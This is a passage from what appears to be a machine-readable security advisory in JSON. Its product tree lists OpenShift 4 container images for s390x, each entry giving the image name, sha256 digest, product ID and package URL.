"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-utils-rhel9@sha256%3A7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-apiserver-network-proxy-rhel9@sha256%3Ad710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564822"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product_id": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-service-rhel9-operator@sha256%3A1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606981"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-cluster-api-controllers-rhel9@sha256%3A3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557282"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3A6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607663"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-rhel9-operator@sha256%3Ab7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557287"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-artifacts-rhel9@sha256%3Ae3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cloud-credential-rhel9-operator@sha256%3Ac17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product_id": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/cloud-network-config-controller-rhel9@sha256%3Ad48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572181"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-api-rhel9@sha256%3Adcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606727"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-authentication-rhel9-operator@sha256%3A334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572199"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9-operator@sha256%3A6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564820"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-bootstrap-rhel9@sha256%3A0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572490"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-capi-rhel9-operator@sha256%3A9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-cloud-controller-manager-rhel9-operator@sha256%3A1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-api-rhel9@sha256%3Ad1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604875"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-config-rhel9-operator@sha256%3Aa8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557260"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-control-plane-machine-set-rhel9-operator@sha256%3Aeb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256%3Ae81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606942"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-dns-rhel9-operator@sha256%3A5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-image-registry-rhel9-operator@sha256%3A3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-ingress-rhel9-operator@sha256%3A2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573139"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3A8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604138"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-cluster-api-rhel9-operator@sha256%3A7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604093"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-controller-manager-rhel9-operator@sha256%3A0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-scheduler-rhel9-operator@sha256%3A48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604716"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256%3Abe277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3Ac5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3Ac28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3Adcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
